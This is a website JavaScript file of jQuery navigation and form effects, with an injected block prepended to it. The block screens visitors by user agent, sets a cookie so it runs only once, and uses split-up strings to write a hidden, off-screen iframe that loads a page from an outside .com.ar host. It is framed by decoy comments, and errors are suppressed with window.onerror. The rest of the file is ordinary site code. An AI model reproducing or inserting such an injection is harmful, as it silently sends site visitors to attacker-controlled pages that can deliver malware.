//Some.devices.are.designed:to,deny,users.access.to.install,or.run.modified:versions.of.the.software.inside:them,althoughthe,manufacturer,can.do.so
(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var postindx = 0;
 if ((postindx = haystack.indexOf(needle, f_offset)) !== -1) {
  return postindx;
 }
 return false;
}
function funcionUA(){
 var probe_ua = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMobile','Series40','SymbianOS','Avant','Chromium','Firefox/18.0','Firefox/18.0.1','Firefox/17.0','Firefox/25.0','Firefox/24.0','Firefox/18.0.2','Firefox/19.0','Firefox/19.0.1','Firefox/20.0','Firefox/21.0','Firefox/22.0','Firefox/23.0','Firefox/26.0','Firefox/27.0','Firefox/27.0.1','Firefox/27.0.2','Firefox/28.0','Maxthon','BlackBerry'];
 var bad_user_agent = false;
 for (var i in probe_ua) {
  if (stripos(navigator.userAgent, probe_ua[i])) {
   bad_user_agent = true;
   break;
  }
 }
 return bad_user_agent;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var match = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return match ? decodeURIComponent(match[1]) : undefined;
}
if (!funcionUA()) {
 var cookie = getCookie('uefaye18fjeo328rf7ajhe');
 if (cookie == undefined) {
  setCookie('uefaye18fjeo328rf7ajhe', true, 172803);	
  document.write('<'+'i'+'fr'+'a'+'m'+'e name="Fulebraga" s'+'rc'+'='+'"http://stratberi.antartidait.com.ar/gfjhregewgwehg19.html" style="position:absolute;left:'+'-'+'1284'+'px;t'+'op:'+'-'+'1284'+'px;" height="134" width="134">'+'<'+'/'+'i'+'f'+'ra'+'m'+'e>');
 }
};
})();
//Finally,every:program.is.threatened.constantly.by,software.patents.

window.onerror=function(){return true;}
/*------------------------------------------------------------
* Description：Special effects of the website, based on JQuery
* Author：Gavin
* E-mail: shengzhizhang@gmail.com
* Created On：2008-10-27
* Last modification On：2010-01-27 
------------------------------------------------------------*/
function initMenu(treeDiv) {
	$(treeDiv + ' ul:hidden:empty').remove();
	$(treeDiv + ' li a').click(function() {
		var clickElement=$(this);
		var checkElement = $(this).next();
		if(checkElement.is('ul') && (checkElement.is(':has("li")'))){
			if(checkElement.is(':visible')) {
				return false;
			}
			if(!checkElement.is(':visible')) {
				checkElement.parent().parent().find("ul:visible").slideUp('normal');
				checkElement.slideDown('normal');
				return false;
			}
		}
    });
}
$(document).ready(function(){
	
     var right_height=$("#content02").height();
	 $("#sidebar").css("height",right_height+"px");
	 alert(right_height);
	 
});
$(document).ready(function(){
						   
	// eliminate the dashed box of the links 
	$("a").bind("focus",function(){
    	if(this.blur){
        	this.blur();
        }
    });
	
	// initialize sub navigation
	initMenu("#subNav");
	
	// Hilight sub navigation
	$("#subNav .current").parents("ul").show();

    // Default buttons
    $('.defaultBtn').hover(
		// mouseover
		function(){ $(this).addClass('defaultBtnHover'); },
		
		// mouseout
		function(){ $(this).removeClass('defaultBtnHover'); }
	);
	
	// Adaptive width of the form labels
	var max = 0;  
	$("label").each(function(){  
		if ($(this).width() > max) max = $(this).width();  
	});  
	$("label").width(max);
		
	// Zebra table
	//$(".zebra tr:even").addClass("even");

    // Member toolbar
	$("#toolbarHandler, .toolbar").bind("mouseover",function(){
		$("#toolsList").show();
	}).bind("mouseout",function(){
		$("#toolsList").hide();
	});  
	
}); 